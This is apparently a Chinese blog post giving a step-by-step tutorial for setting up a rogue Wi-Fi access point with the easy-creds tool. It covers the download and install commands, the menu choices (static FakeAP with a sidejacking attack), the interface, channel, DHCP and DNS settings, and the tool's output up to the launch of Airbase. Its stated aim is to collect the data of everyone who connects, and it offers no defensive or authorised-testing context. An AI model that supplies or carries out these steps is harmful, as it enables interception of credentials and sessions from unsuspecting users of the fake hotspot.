Easy-Creds 製作一個假AP

有時要使用一個新AP...來做假的AP, 收集每個連線進來資料

1. 先到 https://github.com/brav0hax/easy-creds   下載 easy-creds-master.zip
2. 執行
unzip easy-creds-master.zip
cd easy-creds-master
./installer.sh  >>>選1  (安裝系統)
3.   ./easy-creds.sh
1.  FakeAP Attack Static
2.  FakeAP Attack EvilTwin
3.  Karmetasploit Attack
4.  FreeRadius Attack
5.  DoS AP Options
6.  Previous Menu

Choice: 1  (製作一個假AP)

4. 接著跑...
____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||e |||a |||s |||y |||- |||c |||r |||e |||d |||s ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
Version 3.8-dev - Garden of New Jersey

At any time, ctrl+c  to cancel and return to the main menu

Would you like to include a sidejacking attack? [y/N]: y
Network Interfaces:

Interface connected to the internet (ex. eth0):
Interface connected to the internet (ex. eth0): eth0

PHY Interface Driver Chipset

phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187

Wireless interface name (ex. wlan0): wlan0
ESSID you would like your rogue AP to be called, example FreeWiFi: AP
Channel you would like to broadcast on: 5

[*] Your interface has now been placed in Monitor Mode

phy0 wlan0mon rtl8187 Realtek Semiconductor Corp. RTL8187


Enter your monitor enabled interface name, (ex: mon0): mon0
Would you like to change your MAC address on the mon interface? [y/N]: n

Enter your tunnel interface, example at0: at0
Do you have a dhcpd.conf file to use? [y/N]: n
Network range for your tunneled interface, example 10.0.0.0/24: 10.0.0.0/24

The following DNS server IPs were found in your /etc/resolv.conf file:
<> 168.95.1.1
<> 192.168.8.254

Enter the IP address for the DNS server, example 8.8.8.8: 8.8.8.8

[*] Creating a dhcpd.conf to assign addresses to clients that connect to us.
[*] Launching Airbase with your settings.


====================================================








留言

這個網誌中的熱門文章

用趨勢偵測 log4j

urlcrazy 真的很crazy